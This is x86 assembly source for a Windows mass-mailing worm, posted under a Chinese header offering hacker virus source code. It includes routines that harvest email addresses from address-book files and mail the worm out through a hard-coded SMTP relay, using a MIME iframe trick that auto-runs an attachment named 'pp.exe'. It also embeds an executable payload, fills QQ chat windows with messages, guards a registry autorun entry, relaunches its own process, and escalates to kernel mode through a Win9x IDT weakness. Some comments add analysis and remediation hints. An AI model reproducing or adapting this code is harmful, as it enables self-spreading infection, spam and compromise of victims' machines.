📄 wap32.asm

📁 中国黑客病毒源代码,有兴趣的朋友可以看一下
	call	[esi.KnlLRead],ebx,eax,01
	pop	ecx
	pop	edx
	or	eax,eax
	jz	short CloseDbFile
	mov	eax,esp
	add	eax,20h
	cmp	edi,eax
	ja	short ScanEmailStr
	cmp	cl,'@'
	jz	short IsMailAtFlag
	cmp	cl,'.'
	jz	short IsMailDotFlag
	cmp	cl,30h
	jb	short IsMailAddr
	cmp	cl,39h
	jb	short StoreMailChar
	cmp	cl,41h
	jb	short IsMailAddr
	cmp	cl,7eh
	jb	short StoreMailChar
IsMailAddr:
	xor	eax,eax
	cld
	stosb
	cmp	dh,01
	jnz	short ScanEmailStr
	cmp	dl,01
	jb	short ScanEmailStr
	sub	edi,esp
	cmp	edi,6
	jb	short ScanEmailStr
	mov	al,[esp]
	cmp	al,'@'
	jz	short ScanEmailStr
	cmp	al,'.'
	jz	short ScanEmailStr
	call	FoundMailObject,esp
	jmp	short ScanEmailStr	
IsMailDotFlag:	
	inc	dl
	jmp	short StoreMailChar
IsMailAtFlag:
	inc	dh
StoreMailChar:
	mov	al,cl
	cld
	stosb
	jmp	short ReadDbFile
CloseDbFile:
	call	[esi.KnlLClose],ebx
	add	esp,100h 
EnumDbMailEnd:
	popad
	ret
EnumDbMail endp

;-----------------------------------------------------------------------
; EnumWabMail(WabFile)
; Opens an address-book (.wab) file through the API table at esi, reads
; its first 100h bytes, seeks to the Unicode address records the header
; points at, and hands each record (converted to ANSI) to FoundMailObject.
; In:    WabFile = pointer to the file path (stack argument)
;        esi     = API table; KnlLOpen/KnlLRead/KnlLSeek/KnlLClose and
;                  KnlWideCharToMultiByte are fetched from it
; Out:   none; pushad/popad preserves every register
; Stack: 100h-byte scratch buffer, plus a second 100h while converting
;-----------------------------------------------------------------------
EnumWabMail proc WabFile: dword
	pushad
	call	[esi.KnlLOpen],WabFile,0	; mode 0; -1 means the open failed
	cmp	eax,-1
	jz	short EnumWabMailEnd
	mov	ebx,eax				; ebx = file handle for the rest of the proc
	sub	esp,100h			; scratch buffer shared by header and records
	mov	edi,esp
	call	[esi.KnlLRead],ebx,edi,100h
	cmp	eax,100h			; a short read is not a usable header
	jnz	short CloseWabFile
	mov	eax,[edi+60h]			; header dword 60h: file offset of the Unicode address records
	call	[esi.KnlLSeek],ebx,eax,0
	mov	ecx,[edi+64h]			; header dword 64h: number of records
	cmp	ecx,1000h			; sanity cap on the count (unsigned compare)
	ja	short CloseWabFile
ContReadWabMail:
	push	ecx				; loop counter must survive the calls below
	call	[esi.KnlLRead],ebx,edi,44h	; read one 44h-byte record
	sub	esp,100h			; 100h-byte ANSI output buffer
	mov	eax,esp
	call	[esi.KnlWideCharToMultiByte],0,200h,edi,-1,eax,100h,0,0	; -1: record is a NUL-terminated wide string
	call	FoundMailObject,esp		; callback receives the ANSI address
	add	esp,100h
	pop	ecx
	loop	short ContReadWabMail
CloseWabFile:
	add	esp,100h
	call	[esi.KnlLClose],ebx
EnumWabMailEnd:
	popad
	ret
EnumWabMail endp

;-----------------------------------------------------------------------
; MakeMailFile(eMail, hVirFile, hEmlFile)
; Writes one message to hEmlFile: the header built by FormatMailHeader,
; then up to 3000h bytes read from hVirFile, base64-encoded by
; AnsiToBase64, then the four bytes CR LF CR LF.
; In:    eMail    = recipient address string (passed to FormatMailHeader)
;        hVirFile = handle read with KnlLRead
;        hEmlFile = handle written with KnlLWrite
;        esi      = API table
; Out:   eax = 1 on every path (the read-failure path returns 1 as well)
; Stack: all scratch space is carved below esp and released in one step
;        by restoring OldEsp; nothing is freed incrementally
;-----------------------------------------------------------------------
MakeMailFile proc eMail: dword,hVirFile: dword,hEmlFile: dword
	local	OldEsp: dword
	pushad
	mov	OldEsp,esp			; single restore point for the whole frame
	sub	esp,1000h			; header buffer
	mov	edi,esp
	call	FormatMailHeader,edi,eMail	; eax = header length
	call	[esi.KnlLWrite],hEmlFile,edi,eax
	sub	esp,1000h			; 3000h-byte read buffer, grown one page at a
	mov	[esp],eax			; time with a store into each new page
	sub	esp,1000h			; (presumably to commit the stack pages in
	mov	[esp],eax			; order; the stored value itself is unused)
	sub	esp,1000h
	mov	[esp],eax
	mov	edi,esp
	call	[esi.KnlLRead],hVirFile,edi,3000h	; eax = bytes read, -1 on error
	cmp	eax,-1
	jz	short MakeMailFileEnd
	mov	edx,esp				; edx = raw data, eax = its size
	sub	esp,1000h			; 4000h-byte base64 output buffer,
	mov	[esp],eax			; grown the same page-by-page way
	sub	esp,1000h
	mov	[esp],eax
	sub	esp,1000h
	mov	[esp],eax
	sub	esp,1000h
	mov	[esp],eax
	mov	edi,esp	
	call	AnsiToBase64,edx,eax,edi	; eax = encoded length (NUL not counted)
	call	[esi.KnlLWrite],hEmlFile,edi,eax
	mov	dword ptr[esp],0a0d0a0dh	; bytes 0D 0A 0D 0A at the buffer start (esp == edi here)
	call	[esi.KnlLWrite],hEmlFile,edi,4
MakeMailFileEnd:
	mov	esp,OldEsp
	popad
	mov	eax,1
	ret	
MakeMailFile endp

;-----------------------------------------------------------------------
; SmtpSendMail(eMail, hVirFile)
; Opens a TCP connection to port 25 of the hard-coded relay host named
; below, sends the header from FormatMailHeader, the base64 body read
; from hVirFile, the "<CRLF>.<CRLF>" terminator and "QUIT<CRLF>".
; No reply is ever read: each send is followed by a fixed 4000 ms sleep.
; In:    eMail    = recipient address string
;        hVirFile = handle read with KnlLRead
;        esi      = API table (Ws* = Winsock, Knl* = kernel32 entries)
; Out:   eax = 1 only if the whole sequence was sent, else 0
; Stack: like MakeMailFile, everything is released via OldEsp
; Net:   the literal relay name and port 25 below are the observable
;        network indicators of this routine
;-----------------------------------------------------------------------
SmtpSendMail proc eMail: dword,hVirFile: dword
	local	OldEsp: dword
	local	RetVal:	dword
	pushad	
	mov	OldEsp,esp
	mov	RetVal,0
	sub	esp,1000h			; buffer: first WSADATA, then reused as sockaddr
	mov	edi,esp
	call	[esi.WsWSAStartup],101h,esp	; Winsock 1.1 requested
	or	eax,eax
	jnz	SendMailQuit
	call	[esi.Wssocket],AF_INET,SOCK_STREAM,0
	cmp	eax,-1h
	jz	ClearSocket
	mov	ebx,eax				; ebx = socket
	
	mov	[edi.sin_family],AF_INET
	call	[esi.Wshtons],25		; SMTP port
	mov	[edi.sin_port],ax
	call	PushSmtpSrvr			; call/pop trick: pushes the address of the
	db	'btamail.net.cn',0		;   string as the gethostbyname argument
PushSmtpSrvr:
	call	[esi.Wsgethostbyname]
	or	eax,eax
	jz	CloseSocket
	mov	eax,[eax.h_ip]			; first entry of the hostent address list (by its use here)
	mov	eax,[eax]
	mov	[edi.sin_addr],eax
	call	[esi.Wsconnect],ebx,edi,size SOCKADDR
	cmp	eax,-1h
	jz	CloseSocket

	call	FormatMailHeader,edi,eMail	; header overwrites the sockaddr buffer
	call	[esi.Wssend],ebx,edi,eax,0
	call	[esi.KnlSleep],4000		; no recv anywhere: timing replaces a reply check
	
	sub	esp,1000h			; 3000h-byte read buffer, touched page by page
	mov	[esp],eax			; (stored value is unused)
	sub	esp,1000h
	mov	[esp],eax
	sub	esp,1000h
	mov	[esp],eax
	mov	edi,esp
	call	[esi.KnlLRead],hVirFile,edi,3000h	; eax = bytes read, -1 on error
	cmp	eax,-1
	jz	CloseSocket
	
	sub	esp,1000h			; 4000h-byte base64 output buffer
	mov	[esp],eax
	sub	esp,1000h
	mov	[esp],eax
	sub	esp,1000h
	mov	[esp],eax
	sub	esp,1000h
	mov	[esp],eax
	mov	edx,esp
	call	AnsiToBase64,edi,eax,edx	; eax = encoded length
	mov	edi,esp
	call	[esi.Wssend],ebx,edi,eax,0
	call	[esi.KnlSleep],4000
	
	call	PushMailEnd			; call/pop trick: eax = address of the bytes below
	db	0dh,0ah,'.',0dh,0ah		; DATA terminator, 5 bytes
PushMailEnd:
	pop	eax
	call	[esi.Wssend],ebx,eax,5,0
	call	[esi.KnlSleep],4000
	
	call	PushMailQuit
	db	'QUIT',0dh,0ah			; 6 bytes
PushMailQuit:
	pop	eax
	call	[esi.Wssend],ebx,eax,6,0
	call	[esi.KnlSleep],4000

	mov	RetVal,1			; reached only after QUIT was sent
CloseSocket:
	call	[esi.Wsclosesocket],ebx
ClearSocket:
	call	[esi.WsWSACleanup]
SendMailQuit:
	mov	esp,OldEsp
	popad
	mov	eax,RetVal
	ret
SmtpSendMail endp

;-----------------------------------------------------------------------
; FormatMailHeader(MailHeader, eMail)
; Formats the SMTP envelope plus MIME header template below into
; MailHeader with wsprintfA. The four %s slots are filled in order:
;   RCPT TO  <- eMail
;   FROM     <- local computer name (GetComputerNameA), "@yahoo.com" appended
;   TO       <- eMail
;   SUBJECT  <- local computer name
; The template declares a two-part multipart/mixed body: an HTML part
; with a 0x0 iframe referencing cid:THE-CID, and a base64 part labelled
; audio/x-wav named "pp.exe" carrying that content-id. That header
; combination is a well-known malformed-MIME pattern and a reliable
; mail-gateway signature for this message.
; In:    MailHeader = output buffer (size is not checked here)
;        eMail      = recipient string
;        esi        = API table
; Out:   eax = number of characters written by wsprintfA
; Stack: 100h-byte computer-name buffer
;-----------------------------------------------------------------------
FormatMailHeader proc MailHeader: dword,eMail: dword
	local	MailHeaderLong: dword
	pushad	
	mov	eax,100h
	sub	esp,eax				; edx = name buffer, 100h bytes
	mov	edx,esp
	push	eax				; in/out size dword for GetComputerNameA
	call	[esi.KnlGetComputerNameA],edx,esp
	pop	eax
	call	PushMailData			; call/pop trick: eax = address of the template
	db	'HELO btamail.net.cn',0dh,0ah
	db	'MAIL FROM: imissyou@btamail.net.cn',0dh,0ah
	db	'RCPT TO: %s',0dh,0ah
	db	'DATA',0dh,0ah
	db	'FROM: %s@yahoo.com',0dh,0ah
	db	'TO: %s',0dh,0ah
	db	'SUBJECT: %s is comming!',0dh,0ah		   
	db	'MIME-Version: 1.0',0dh,0ah
	db	'Content-type: multipart/mixed; boundary="#BOUNDARY#"',0dh,0ah
	db	0dh,0ah
	db	'--#BOUNDARY#',0dh,0ah
	db	'Content-Type: text/html',0dh,0ah
	db	'Content-Transfer-Encoding: quoted-printable',0dh,0ah
	db	0dh,0ah
	db	'<html><HEAD></HEAD><body bgColor=3D#ffffff><iframe src=3Dcid:THE-CID height=3D0 width=3D0></iframe></body></html>',0dh,0ah
	db	0dh,0ah
	db	'--#BOUNDARY#',0dh,0ah	
	db	'MIME-Version: 1.0',0dh,0ah
	db	'Content-Type: audio/x-wav; name="pp.exe"',0dh,0ah
	db	'Content-Transfer-Encoding: base64',0dh,0ah
	db	'Content-id: THE-CID',0dh,0ah
	db	0dh,0ah,0
PushMailData:
	pop	eax				; eax = template, esp = name buffer
	mov	edi,esp				; edi = computer name
	call	[esi.UserwsprintfA],MailHeader,eax,eMail,edi,eMail,edi
	mov	esp,edi				; drops the cdecl arguments in one move
	mov	MailHeaderLong,eax
	add	esp,100h			; release the name buffer
	popad
	mov	eax,MailHeaderLong
	ret
FormatMailHeader endp

;-----------------------------------------------------------------------
; AnsiToBase64(AnsiBuff, AnsiSize, Base64Buff)
; Bit-serial base64 encoder: pulls the input one bit at a time through
; GetBit (MSB first), emits one alphabet character per 6 bits, left-pads
; the final partial group with zero bits, writes the '=' padding and a
; terminating NUL.
; In:    AnsiBuff   = input bytes
;        AnsiSize   = input length in bytes
;        Base64Buff = output buffer (needs 4/3 of the input plus NUL;
;                     not checked here)
; Out:   eax = characters written, excluding the NUL
; Note:  esi is repointed at the alphabet inside this proc, so the API
;        table is not reachable through esi until popad; the inner loop
;        calls GetBit once per input bit.
;-----------------------------------------------------------------------
AnsiToBase64 proc AnsiBuff: dword,AnsiSize:dword,Base64Buff:dword
	local	nBase64Size: dword
	pushad
	mov	nBase64Size,0
	call	GetBase64Char			; call/pop trick to locate the alphabet
	Base64Char	db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
			db 'abcdefghijklmnopqrstuvwxyz'
			db '0123456789+/',0
GetBase64Char:
	pop	esi				; esi = offset Base64Char
	mov	edi,Base64Buff
	mov	edx,AnsiSize
	shl	edx,3				; edx = total number of input bits
	xor	ebx,ebx				; ebx = current bit index
ContTurn:
	xor	eax,eax				; eax = 6-bit value being assembled
	mov	ecx,6				; bits still wanted for this group
ContGetBit:
	shl	eax,1
	call	GetBit,AnsiBuff,ebx		; ORs bit ebx of the input into al
	dec	edx
	jz	short GetBitOver		; last input bit consumed
	inc	ebx
	loop	short ContGetBit
	mov	al,[esi+eax]			; full group: look up and emit
	cld
	stosb
	inc	nBase64Size
	jmp	short ContTurn
GetBitOver:
	dec	ecx				; ecx = 6 - bits collected in this group
	shl	eax,cl				; left-justify the partial group with zero bits
	mov	al,[esi+eax]
	cld
	stosb
	inc	nBase64Size
	shr	ecx,1				; number of '=' pads: 0, 1 or 2
	add	nBase64Size,ecx
	mov	al,'='				; pad with '='; one '=' stands for two missing bits
	cld
	rep	stosb
	xor	al,al				; NUL terminator, not counted
	stosb
	popad
	mov	eax,nBase64Size
	ret	
AnsiToBase64 endp

;AnsiToBase64子程序,得到一位的值
;-----------------------------------------------------------------------
; GetBit(SrcStr, nCx) -- helper for AnsiToBase64
; ORs bit number nCx of the byte array SrcStr into al. Bits are numbered
; MSB-first within each byte (bit 0 is the top bit of byte 0), which is
; what base64 needs. The caller's partial value is expected in al; the
; remaining bits of eax are left untouched.
; In:    SrcStr = input bytes, nCx = absolute bit index
; Out:   al |= selected bit (0 or 1)
; Clobb: none beyond al (ecx, edx, esi are saved by the uses clause)
;-----------------------------------------------------------------------
GetBit proc uses ecx edx esi,SrcStr:DWORD,nCx:DWORD
	mov	esi,SrcStr
	mov	ecx,nCx
	mov	edx,ecx
	shr	edx,3				; byte offset = index / 8
	mov	dl,[esi+edx]
	not	cl				; cl = 7 - (index mod 8), i.e. shift from the MSB
	and	cl,07h
	shr	dl,cl
	and	dl,01h 
	or	al,dl
	ret
GetBit endp
	
;-----------------------------------------------------------------------
; SetSehFrame -- install a stack SEH frame whose handler resumes at ecx
; Called with ecx = address to continue at if anything in the protected
; region faults. Leaves on the caller's stack, below the return address:
;   [resume address][handler = Exception][previous fs:[0]][saved esp slot]
; and records the resulting esp in the dword inside GetSaveEspAddr so
; that ClearSehFrame (or the handler) can unwind to it. The code stream
; must be writable for that slot; the stray E9 bytes are junk meant to
; derail static disassemblers (as the original comments state).
;-----------------------------------------------------------------------
SetSehFrame:	;ecx = address to continue at, ignoring the error
	pop	eax		;pop the return address
	push	ecx		;keep the resume address on the stack
	call	PushExceptionProc	;pushes the address of the jmp below = handler entry
	jmp	short Exception
	db	0e9h		;static-disassembly interference byte
PushExceptionProc:
	push	fs:dword ptr[0]	;link previous frame
	mov	fs:[0],esp	;new frame = {prev, handler}
	call	GetSaveEspAddr	;edx = address of the saved-esp slot
	push	dword ptr[edx]	;keep the previous saved esp
	mov	[edx],esp	;record the current esp
	jmp	eax		;return to caller
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; ClearSehFrame -- undo SetSehFrame
; Restores esp from the slot in GetSaveEspAddr, pops the previous saved
; esp back into that slot, re-links fs:[0], discards the handler address
; and the resume address, and returns to whoever called it. Used both on
; the normal path and from inside Exception, so the stack is unwound the
; same way whether or not a fault happened.
;-----------------------------------------------------------------------
ClearSehFrame:
	pop	eax		;pop the return address
	call	GetSaveEspAddr
	mov	esp,[edx]	;restore esp recorded at frame setup
	pop	dword ptr[edx]	;restore the previously saved esp
	pop	fs:dword ptr[0]	;unlink this frame
	pop	ecx		;discard handler address
	pop	ecx		;discard resume address
	jmp	eax
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; GetSaveEspAddr -- edx = address of the in-code dword used as the
; saved-esp slot (call/pop trick; the dd is data embedded in the code
; stream and is written at runtime by SetSehFrame/ClearSehFrame).
;-----------------------------------------------------------------------
GetSaveEspAddr:
	call	PushOffsetSaveEspAddr
	dd	?		;saved esp slot
PushOffsetSaveEspAddr:
	pop	edx
	ret
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; Exception(pRecord, pFrame, pContext, pDispatch) -- SEH handler
; Points the faulting context's Eip at the "call ClearSehFrame" below and
; returns 0 (continue execution). When the thread resumes there,
; ClearSehFrame unwinds the frame installed by SetSehFrame and its
; "jmp eax" lands on "jmp ecx", where ecx is the resume address that
; ClearSehFrame just popped. Net effect: any exception in the protected
; region silently continues at the address SetSehFrame was given.
; Note: the proc has named arguments, so the assembler presumably adds a
; frame prologue/epilogue around the ret (inferred from the proc syntax).
;-----------------------------------------------------------------------
Exception proc pRecord,pFrame,pContext,pDispatch	
	call	PushSehBackProc		;ecx = address of the next instruction
	call	ClearSehFrame		;resume point: removes the unexpected-SEH frame
	jmp	ecx			;ecx = resume address popped by ClearSehFrame
	db	0e9h		;static-disassembly interference byte
PushSehBackProc:
	pop	ecx
	mov	eax,pContext
	mov	[eax.cx_Eip],ecx	;resume the thread at "call ClearSehFrame"
	xor	eax,eax		;ExceptionContinueExecution: ignore the error, keep going
	ret
Exception endp

;-----------------------------------------------------------------------
; UnzipVirusToFile -- expand the embedded byte stream below into hFile
; In:    ebx = output file handle, esi = API table
; Format of the embedded data (zero-run encoding): a non-zero byte is
; written as is; a 00 byte followed by n writes n zero bytes; 00 00 ends
; the stream. Every byte is written with a separate one-byte KnlLWrite.
; The decoded bytes form a small PE image (MZ/PE headers, the DOS stub
; text and an import of KERNEL32 Sleep are readable in the table); this
; is the payload that the MIME header elsewhere labels "pp.exe".
;-----------------------------------------------------------------------
UnzipVirusToFile: ;ebx=hFile
	call	GetVirusZipData		;call/pop trick: edi = start of the table
	db 04Dh,05Ah,050h,000h,001h,002h,000h,003h,004h,000h,001h,00Fh,000h,001h,0FFh,0FFh
	db 000h,002h,0B8h,000h,007h,040h,000h,001h,01Ah,000h,022h,001h,000h,002h,0BAh,010h
	db 000h,001h,00Eh,01Fh,0B4h,009h,0CDh,021h,0B8h,001h,04Ch,0CDh,021h,090h,090h,054h
	db 068h,069h,073h,020h,070h,072h,06Fh,067h,072h,061h,06Dh,020h,06Dh,075h,073h,074h
	db 020h,062h,065h,020h,072h,075h,06Eh,020h,075h,06Eh,064h,065h,072h,020h,057h,069h
	db 06Eh,033h,032h,00Dh,00Ah,024h,037h,000h,088h,050h,045h,000h,002h,04Ch,001h,004h
	db 000h,001h,0B5h,02Ch,0EFh,082h,000h,008h,0E0h,000h,001h,08Eh,081h,00Bh,001h,002h
	db 019h,000h,001h,002h,000h,003h,006h,000h,007h,010h,000h,003h,010h,000h,003h,020h
	db 000h,004h,040h,000h,002h,010h,000h,003h,002h,000h,002h,001h,000h,007h,003h,000h
	db 001h,00Ah,000h,006h,050h,000h,003h,004h,000h,006h,002h,000h,005h,010h,000h,002h
	db 020h,000h,004h,010h,000h,002h,010h,000h,006h,010h,000h,00Ch,030h,000h,002h,04Eh
	db 000h,01Ch,040h,000h,002h,00Ch,000h,053h,043h,04Fh,044h,045h,000h,005h,010h,000h
	db 003h,010h,000h,003h,002h,000h,003h,006h,000h,00Eh,020h,000h,002h,060h,044h,041h
	db 054h,041h,000h,005h,010h,000h,003h,020h,000h,003h,002h,000h,003h,008h,000h,00Eh
	db 040h,000h,002h,0C0h,02Eh,069h,064h,061h,074h,061h,000h,003h,010h,000h,003h,030h
	db 000h,003h,002h,000h,003h,00Ah,000h,00Eh,040h,000h,002h,0C0h,02Eh,072h,065h,06Ch
	db 06Fh,063h,000h,003h,010h,000h,003h,040h,000h,003h,002h,000h,003h,00Ch,000h,00Eh
	db 040h,000h,002h,050h,000h,0FFh,000h,0FFh,000h,0FFh,000h,06Bh,0C3h,0FFh,025h,030h
	db 030h,040h,000h,0FFh,000h,0FFh,000h,0FFh,000h,0FDh,028h,030h,000h,00Ah,038h,030h
	db 000h,002h,030h,030h,000h,016h,046h,030h,000h,006h,046h,030h,000h,006h,04Bh,045h
	db 052h,04Eh,045h,04Ch,033h,032h,02Eh,064h,06Ch,06Ch,000h,004h,053h,06Ch,065h,065h
	db 070h,000h,0FFh,000h,0B5h,010h,000h,002h,00Ch,000h,003h,003h,030h,000h,0FFh,000h
	db 0FFh,000h,0FFh,000h,0F9h,000h,000h
GetVirusZipData:
	pop	edi		;edi = the compressed PE file data
ContUnZipVirus:
	mov	al,[edi]
	inc	edi
	or	al,al
	jz	short WriteVirusSomeBytes	;00 introduces a zero run
	push	eax			;literal byte: write it from the stack
	mov	eax,esp
	call	[esi.KnlLWrite],ebx,eax,01
	pop	eax
	jmp	short ContUnZipVirus
WriteVirusSomeBytes:
	movzx	ecx,byte ptr[edi]	;ecx = run length
	inc	edi
	jecxz	UnzipVirusEnd	;keep expanding until a double 00
ContWriteVirusBytes:
	push	ecx
	push	eax			;al is 0 here, so the run is zero bytes
	mov	eax,esp
	call	[esi.KnlLWrite],ebx,eax,01
	pop	eax
	pop	ecx
	loop	ContWriteVirusBytes
	jmp	short ContUnZipVirus
UnzipVirusEnd:
	ret
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; SendQQMsg(Param) -- position-independent worker thread
; Polls every 500 ms for a top-level window titled '发送消息' ("send
; message"), takes its first child with GetWindow(GW_CHILD), and when
; that child's text is empty (WM_GETTEXT returns 0) sets it to a message
; built here: 24 CR LF pairs followed by one of 8 strings selected by
; esi. After all 8 strings have been placed (esi wraps to 0) the routine
; returns; otherwise it loops forever. Nothing in view actually submits
; the text; it only fills the control.
; The API addresses live in the dd slots next to their call/pop
; sequences (FindWindowA, GetWindow, SendMessageA, Sleep); they are
; filled in at runtime, so this block is meant to be copied and run
; without import resolution. PushQQMsg is not in view; from its use it
; appears to leave a table of message pointers on the stack with the
; byte count in ecx -- unconfirmed.
; In:    Param = unused in view
; Stack: 100h-byte message buffer; 1000h temporarily for WM_GETTEXT
;-----------------------------------------------------------------------
SendQQMsg proc Param: dword
	sub	esp,100h
	xor	esi,esi				; esi = index of the message to use next
BuildQQMsg:
	mov	edi,esp
	mov	ax,0a0dh			; stored little-endian: 0D 0A
	mov	ecx,12
	cld
	rep	stosw				; 24 CR LF pairs
	call	PushQQMsg			; not in this chunk
	mov	edx,[esp+esi*4]			; edx = pointer to message #esi
	add	esp,ecx
StoreQQMsg:
	mov	al,[edx]			; copy the string including its NUL
	inc	edx
	cld
	stosb
	or	al,al
	jnz	short StoreQQMsg	
	call	PushQQWndText			; call/pop trick: window title pushed as argument
	db	'发送消息',0
PushQQWndText:
	call	GetFindWindowA
	FindWindowA9x2k dd ?			; runtime-filled API address
GetFindWindowA:
	pop	eax
	call	[eax],0				; FindWindowA(0, title)
	or	eax,eax
	jz	short WaitForQQWnd
	mov	ebx,eax
	call	GetGetWindow
	GetWindow9x2k dd ?			; runtime-filled API address
GetGetWindow:
	pop	eax
	call	[eax],ebx,GW_CHILD		; first child control
	or	eax,eax
	jz	short WaitForQQWnd
	mov	ebx,eax
	call	GetSendMessageA
	SendMessageA9x2k dd ?			; runtime-filled API address
GetSendMessageA:
	pop	edi
	sub	esp,1000h
	call	[edi],ebx,WM_GETTEXT,1000h,esp	; eax = current text length
	add	esp,1000h
	or	eax,eax
	jnz	short WaitForQQWnd		; control already has text: wait
	call	[edi],ebx,WM_SETTEXT,1000h,esp	; esp = the message buffer built above
	inc	esi
	and	esi,07h				; 8 messages, round robin
	jnz	short WaitForQQWnd
	add	esp,100h
	ret
WaitForQQWnd:
	call	GetSleep
	Sleep9x2k dd ?				; runtime-filled API address
GetSleep:
	pop	eax
	call	[eax],500			; 500 ms between polls
	jmp	BuildQQMsg	
SendQQMsg endp
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; RegisterProtectProc(hKey) -- persistence guard thread (never returns)
; Reads the value named "Runonce" under hKey into a 100h-byte stack
; buffer once, then loops: block in RegNotifyChangeKeyValue until the
; key changes (filter 4 = last-set changes, synchronous), and rewrite
; the saved value back with RegSetValueExA as type 1 (REG_SZ), 100h
; bytes. Any edit or deletion of that value is therefore undone at once.
; For remediation this means the thread/process running it must be
; stopped before the registry entry can be cleaned.
; API addresses are runtime-filled dd slots (position-independent copy).
;-----------------------------------------------------------------------
RegisterProtectProc proc hKey:dword
	mov	ebx,hKey	;registry protection routine, usable on 9x/2k
	sub	esp,100h
	mov	edi,esp				; edi = saved value buffer
	call	GetProtectKeyName		; call/pop trick: esi = value name
	db	'Runonce',0
GetProtectKeyName:
	pop	esi
	push	100h				; in/out size for RegQueryValueExA
	call	GetAdvRegQueryValueExA
	AdvRegQueryValueExA9x2k dd ?		; runtime-filled API address
GetAdvRegQueryValueExA:
	pop	eax		;read the original value into the stack buffer
	call	[eax],ebx,esi,0,0,edi,esp
	pop	eax
WaitRegChangeNotify:
	call	GetAdvRegNotifyChangeKeyValue
	AdvRegNotifyChangeKeyValue9x2k dd ?	; runtime-filled API address
GetAdvRegNotifyChangeKeyValue:
	pop	eax		;wait for a registry change notification
	call	[eax],ebx,0,4,0,0
	call	GetAdvRegSetValueExA
	AdvRegSetValueExA9x2k dd ?		; runtime-filled API address
GetAdvRegSetValueExA:
	pop	eax		;restore the original value
	call	[eax],ebx,esi,0,1,edi,100h	
	jmp	short WaitRegChangeNotify	; endless: no exit path
RegisterProtectProc endp
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; ProcessProtectProc(ProcID) -- watchdog: relaunch the process on exit
; Opens ProcID with PROCESS_ALL_ACCESS, waits on it with an infinite
; timeout, then calls WinExec on the path string located at FullPath
; (addressed relative to this code with a call/pop, so the block works
; after being copied elsewhere; ProcessProtectProcSize below measures
; the block for that copy). If OpenProcess fails it simply returns.
; API addresses are runtime-filled dd slots.
; For remediation: the watched process and the host of this routine
; need to be stopped together, or the watched one comes back.
;-----------------------------------------------------------------------
ProcessProtectProc proc ProcID:dword	
	call	GetKnlOpenProcess
	KnlOpenProcess9x2k dd ?			; runtime-filled API address
GetKnlOpenProcess:
	pop	eax	
	call	[eax],PROCESS_ALL_ACCESS,0,ProcID
	or	eax,eax		;open the process
	jz	short ExitProtectProc
	mov	ebx,eax
	call	GetKnlWaitForSingleObject
	KnlWaitForSingleObject9x2k dd ?		; runtime-filled API address
GetKnlWaitForSingleObject:
	pop	eax		;wait for the process to end (-1 = INFINITE)
	call	[eax],ebx,-1h
	call	GetFileNameAddress
GetFileNameAddress:
	pop	ecx				; ecx = address of this label at runtime
	add	ecx,offset FullPath-offset GetFileNameAddress	; ecx = FullPath, position independent
	call	GetKnlWinExec
	KnlWinExec9x2k dd ?			; runtime-filled API address
GetKnlWinExec:
	pop	eax		;restart the virus process
	call	[eax],ecx,01
ExitProtectProc:	
	ret
ProcessProtectProc endp

ProcessProtectProcSize=$-offset ProcessProtectProc	; byte length of the copyable watchdog block
FullPath	db 0e9h		; first byte of the path buffer that follows the block; overwritten at runtime (presumably with the executable path)

;-----------------------------------------------------------------------
; MoveDataToKnl(Src, Des, nCx)
; Copies nCx bytes from Src to Des while running at ring 0, by
; temporarily pointing IDT entry 3 (int 3) at the inline handler below
; and executing int 3. The handler restores the original descriptor,
; does the rep movsb and returns with iret. As the original comment
; says, this relies on the Win9x IDT being writable from user mode;
; the routine has no check for that and simply assumes it.
; Sequence: sidt -> eax = &IDT[3]; ebx:edx = original descriptor;
; "call SetIdt03" pushes the handler address, which SetIdt03 pops into
; the descriptor's offset fields (low word at +0, high word at +6).
; In:    Src, Des = byte pointers, nCx = byte count
; Out:   none; registers restored by pushad/popad
;-----------------------------------------------------------------------
MoveDataToKnl proc Src:dword,Des:dword,nCx:dword
	pushad
	push	eax
	sidt	[esp-2]				; 6-byte IDTR: base dword lands at [esp]
	pop	eax				; eax = IDT base
	add	eax,3*8		;eax = &IDT entry 3
	mov	ebx,[eax]			; save original descriptor, low dword
	mov	edx,[eax+4]			;   and high dword
	call	SetIdt03			; pushes the address of the pushad below
	pushad					; --- ring-0 handler entered via int 3 ---
	mov	[eax],ebx   			; restore the original descriptor first
	mov	[eax+4],edx
	cld
	rep	movsb		;copy code/data to the chosen location in kernel code
	popad
	iret					; back to the instruction after int 3
SetIdt03:
	cli    
	pop	word ptr[eax]			; offset bits 15..0 of the handler
	pop	word ptr[eax+6]			; offset bits 31..16 of the handler
	mov	esi,Src
	mov	edi,Des
	mov	ecx,nCx
	int	3;		;uses the Win9x IDT weakness to enter the system kernel
	sti
	popad
	ret
MoveDataToKnl endp
	db	0e9h		;static-disassembly interference byte

;-----------------------------------------------------------------------
; DbgMsg(pMsg) -- debug helper: MessageBoxA(0, pMsg, pMsg, 0)
; In:    pMsg = NUL-terminated string used as both text and caption
;        esi  = API table
; Out:   none; all registers preserved
;-----------------------------------------------------------------------
DbgMsg	proc pMsg:dword
	pushad
	mov	eax,pMsg
	call	[esi.UserMessageBoxA],0,eax,eax,0
	popad
	ret
DbgMsg	endp
	dd	0,0		; two zero dwords padding the end of the body
VirusEnd:		; end marker of the relocatable body
	;the polymorphic decryption code is placed here (nothing in view generates it)
	ret

.code 				; host/carrier program section; its Start label is outside this view

Msg	db	'Virus has running ok',0	; text and caption of the box shown at Exit

Exit: 	
	call	MessageBoxA,0,offset Msg,offset Msg,0	; direct import: this part is not position independent
	call	ExitProcess,L 0				; L = dword-sized immediate
 
end Start
